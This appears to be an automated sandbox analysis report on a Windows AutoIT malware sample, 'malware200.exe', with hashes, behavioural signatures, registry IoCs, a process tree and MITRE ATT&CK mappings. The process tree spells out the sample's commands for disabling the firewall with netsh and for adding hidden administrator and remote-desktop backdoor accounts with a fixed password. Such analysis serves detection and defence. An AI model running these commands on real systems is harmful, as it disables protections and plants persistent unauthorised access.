Analysis
-
max time kernel
99s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20230824-en -
resource tags
arch:x64arch:x86image:win10v2004-20230824-enlocale:en-usos:windows10-2004-x64system -
submitted
31-08-2023 12:09
Static task
static1
Behavioral task
behavioral1
Sample
malware200.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
malware200.exe
Resource
win10v2004-20230824-en
General
-
Target
malware200.exe
-
Size
448KB
-
MD5
957302c7e0c9e025397c2e3cfdc0fef3
-
SHA1
10ac72a20ac5cd28c94199899fe2eae6ed5b3a84
-
SHA256
ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd
-
SHA512
e1443c86e1acb84c5ecb80db5ecca931882478bfdc792c99875eef93b028ba169433dfa2fea8c7a6ee78a3792108172fb8d2e41103a76c77f8d67ee967948ebc
-
SSDEEP
12288:oquErHF6xC9D6DmR1J98w4oknqOOCyQf1vYOUlsxd:prl6kD68JmlotQfhHUl4
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs 3 IoCs
pid Process 3192 netsh.exe 3200 netsh.exe 1692 netsh.exe -
Modifies WinLogon 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist malware200.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts malware200.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist malware200.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist\AstNet = "0" malware200.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist\server_sys = "0" malware200.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/5096-11-0x0000000000BE0000-0x0000000000CEC000-memory.dmp autoit_exe behavioral2/memory/5096-12-0x0000000000BE0000-0x0000000000CEC000-memory.dmp autoit_exe behavioral2/memory/5096-13-0x0000000000BE0000-0x0000000000CEC000-memory.dmp autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{FC03963B-FC9C-41EE-A375-6E020A82C60B}.catalogItem svchost.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2664 WMIC.exe Token: SeSecurityPrivilege 2664 WMIC.exe Token: SeTakeOwnershipPrivilege 2664 WMIC.exe Token: SeLoadDriverPrivilege 2664 WMIC.exe Token: SeSystemProfilePrivilege 2664 WMIC.exe Token: SeSystemtimePrivilege 2664 WMIC.exe Token: SeProfSingleProcessPrivilege 2664 WMIC.exe Token: SeIncBasePriorityPrivilege 2664 WMIC.exe Token: SeCreatePagefilePrivilege 2664 WMIC.exe Token: SeBackupPrivilege 2664 WMIC.exe Token: SeRestorePrivilege 2664 WMIC.exe Token: SeShutdownPrivilege 2664 WMIC.exe Token: SeDebugPrivilege 2664 WMIC.exe Token: SeSystemEnvironmentPrivilege 2664 WMIC.exe Token: SeRemoteShutdownPrivilege 2664 WMIC.exe Token: SeUndockPrivilege 2664 WMIC.exe Token: SeManageVolumePrivilege 2664 WMIC.exe Token: 33 2664 WMIC.exe Token: 34 2664 WMIC.exe Token: 35 2664 WMIC.exe Token: 36 2664 WMIC.exe Token: SeIncreaseQuotaPrivilege 2664 WMIC.exe Token: SeSecurityPrivilege 2664 WMIC.exe Token: SeTakeOwnershipPrivilege 2664 WMIC.exe Token: SeLoadDriverPrivilege 2664 WMIC.exe Token: SeSystemProfilePrivilege 2664 WMIC.exe Token: SeSystemtimePrivilege 2664 WMIC.exe Token: SeProfSingleProcessPrivilege 2664 WMIC.exe Token: SeIncBasePriorityPrivilege 2664 WMIC.exe Token: SeCreatePagefilePrivilege 2664 WMIC.exe Token: SeBackupPrivilege 2664 WMIC.exe Token: SeRestorePrivilege 2664 WMIC.exe Token: SeShutdownPrivilege 2664 WMIC.exe Token: SeDebugPrivilege 2664 WMIC.exe Token: SeSystemEnvironmentPrivilege 2664 WMIC.exe Token: SeRemoteShutdownPrivilege 2664 WMIC.exe Token: SeUndockPrivilege 2664 WMIC.exe Token: SeManageVolumePrivilege 2664 WMIC.exe Token: 33 2664 WMIC.exe Token: 34 2664 WMIC.exe Token: 35 2664 WMIC.exe Token: 36 2664 WMIC.exe Token: SeIncreaseQuotaPrivilege 3404 WMIC.exe Token: SeSecurityPrivilege 3404 WMIC.exe Token: SeTakeOwnershipPrivilege 3404 WMIC.exe Token: SeLoadDriverPrivilege 3404 WMIC.exe Token: SeSystemProfilePrivilege 3404 WMIC.exe Token: SeSystemtimePrivilege 3404 WMIC.exe Token: SeProfSingleProcessPrivilege 3404 WMIC.exe Token: SeIncBasePriorityPrivilege 3404 WMIC.exe Token: SeCreatePagefilePrivilege 3404 WMIC.exe Token: SeBackupPrivilege 3404 WMIC.exe Token: SeRestorePrivilege 3404 WMIC.exe Token: SeShutdownPrivilege 3404 WMIC.exe Token: SeDebugPrivilege 3404 WMIC.exe Token: SeSystemEnvironmentPrivilege 3404 WMIC.exe Token: SeRemoteShutdownPrivilege 3404 WMIC.exe Token: SeUndockPrivilege 3404 WMIC.exe Token: SeManageVolumePrivilege 3404 WMIC.exe Token: 33 3404 WMIC.exe Token: 34 3404 WMIC.exe Token: 35 3404 WMIC.exe Token: 36 3404 WMIC.exe Token: SeIncreaseQuotaPrivilege 3404 WMIC.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5096 malware200.exe 5096 malware200.exe 5096 malware200.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5096 malware200.exe 5096 malware200.exe 5096 malware200.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5096 wrote to memory of 264 5096 malware200.exe 88 PID 5096 wrote to memory of 264 5096 malware200.exe 88 PID 5096 wrote to memory of 264 5096 malware200.exe 88 PID 5096 wrote to memory of 1596 5096 malware200.exe 90 PID 5096 wrote to memory of 1596 5096 malware200.exe 90 PID 5096 wrote to memory of 1596 5096 malware200.exe 90 PID 5096 wrote to memory of 4552 5096 malware200.exe 89 PID 5096 wrote to memory of 4552 5096 malware200.exe 89 PID 5096 wrote to memory of 4552 5096 malware200.exe 89 PID 5096 wrote to memory of 2900 5096 malware200.exe 91 PID 5096 wrote to memory of 2900 5096 malware200.exe 91 PID 5096 wrote to memory of 2900 5096 malware200.exe 91 PID 5096 wrote to memory of 3348 5096 malware200.exe 96 PID 5096 wrote to memory of 3348 5096 malware200.exe 96 PID 5096 wrote to memory of 3348 5096 malware200.exe 96 PID 1596 wrote to memory of 3200 1596 cmd.exe 98 PID 1596 wrote to memory of 3200 1596 cmd.exe 98 PID 1596 wrote to memory of 3200 1596 cmd.exe 98 PID 4552 wrote to memory of 3192 4552 cmd.exe 100 PID 4552 wrote to memory of 3192 4552 cmd.exe 100 PID 4552 wrote to memory of 3192 4552 cmd.exe 100 PID 264 wrote to memory of 1692 264 cmd.exe 99 PID 264 wrote to memory of 1692 264 cmd.exe 99 PID 264 wrote to memory of 1692 264 cmd.exe 99 PID 3348 wrote to memory of 3404 3348 net.exe 101 PID 3348 wrote to memory of 3404 3348 net.exe 101 PID 3348 wrote to memory of 3404 3348 net.exe 101 PID 2900 wrote to memory of 1276 2900 net.exe 102 PID 2900 wrote to memory of 1276 2900 net.exe 102 PID 2900 wrote to memory of 1276 2900 net.exe 102 PID 5096 wrote to memory of 1944 5096 malware200.exe 103 PID 5096 wrote to memory of 1944 5096 malware200.exe 103 PID 5096 wrote to memory of 1944 5096 malware200.exe 103 PID 1944 wrote to memory of 1352 1944 net.exe 106 PID 1944 wrote to memory of 1352 1944 net.exe 106 PID 1944 wrote to memory of 1352 1944 net.exe 106 PID 5096 wrote to memory of 4464 5096 malware200.exe 107 PID 5096 wrote to memory of 4464 5096 malware200.exe 107 PID 5096 wrote to memory of 4464 5096 malware200.exe 107 PID 4464 wrote to memory of 2308 4464 net.exe 109 PID 4464 wrote to memory of 2308 4464 net.exe 109 PID 4464 wrote to memory of 2308 4464 net.exe 109 PID 5096 wrote to memory of 4636 5096 malware200.exe 110 PID 5096 wrote to memory of 4636 5096 malware200.exe 110 PID 5096 wrote to memory of 4636 5096 malware200.exe 110 PID 4636 wrote to memory of 3432 4636 net.exe 112 PID 4636 wrote to memory of 3432 4636 net.exe 112 PID 4636 wrote to memory of 3432 4636 net.exe 112 PID 5096 wrote to memory of 3944 5096 malware200.exe 113 PID 5096 wrote to memory of 3944 5096 malware200.exe 113 PID 5096 wrote to memory of 3944 5096 malware200.exe 113 PID 3944 wrote to memory of 4616 3944 net.exe 115 PID 3944 wrote to memory of 4616 3944 net.exe 115 PID 3944 wrote to memory of 4616 3944 net.exe 115 PID 5096 wrote to memory of 4996 5096 malware200.exe 116 PID 5096 wrote to memory of 4996 5096 malware200.exe 116 PID 5096 wrote to memory of 4996 5096 malware200.exe 116 PID 5096 wrote to memory of 2908 5096 malware200.exe 118 PID 5096 wrote to memory of 2908 5096 malware200.exe 118 PID 5096 wrote to memory of 2908 5096 malware200.exe 118 PID 5096 wrote to memory of 892 5096 malware200.exe 117 PID 5096 wrote to memory of 892 5096 malware200.exe 117 PID 5096 wrote to memory of 892 5096 malware200.exe 117 PID 4996 wrote to memory of 400 4996 net.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:4324
-
C:\Users\Admin\AppData\Local\Temp\malware200.exe"C:\Users\Admin\AppData\Local\Temp\malware200.exe"1⤵
- Modifies WinLogon
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable2⤵
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode Disable3⤵
- Modifies Windows Firewall
PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off2⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
PID:3200
-
-
-
C:\Windows\SysWOW64\net.exenet user AstNet h3lp12desk /expires:never /add2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add3⤵PID:1276
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators AstNet /add2⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators AstNet /add3⤵PID:3404
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "remote desktop users" AstNet /add2⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add3⤵PID:1352
-
-
-
C:\Windows\SysWOW64\net.exenet group "domain admins" AstNet /add2⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" AstNet /add3⤵PID:2308
-
-
-
C:\Windows\SysWOW64\net.exenet user AstNet /active:yes2⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user AstNet /active:yes3⤵PID:3432
-
-
-
C:\Windows\SysWOW64\net.exenet user AstNet /expires:never2⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user AstNet /expires:never3⤵PID:4616
-
-
-
C:\Windows\SysWOW64\net.exenet user AstNet h3lp12desk2⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user AstNet h3lp12desk3⤵PID:400
-
-
-
C:\Windows\SysWOW64\net.exenet user server_sys h3lp12desk /expires:never /add2⤵PID:892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add3⤵PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"2⤵PID:2908
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators server_sys /add2⤵PID:2444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators server_sys /add3⤵PID:2644
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "remote desktop users" server_sys /add2⤵PID:3840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add3⤵PID:4316
-
-
-
C:\Windows\SysWOW64\net.exenet group "domain admins" server_sys /add2⤵PID:2112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" server_sys /add3⤵PID:4752
-
-
-
C:\Windows\SysWOW64\net.exenet user server_sys /active:yes2⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user server_sys /active:yes3⤵PID:4080
-
-
-
C:\Windows\SysWOW64\net.exenet user server_sys /expires:never2⤵PID:3372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user server_sys /expires:never3⤵PID:4816
-
-
-
C:\Windows\SysWOW64\net.exenet user server_sys h3lp12desk2⤵PID:4364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user server_sys h3lp12desk3⤵PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"2⤵PID:2584
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1284
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1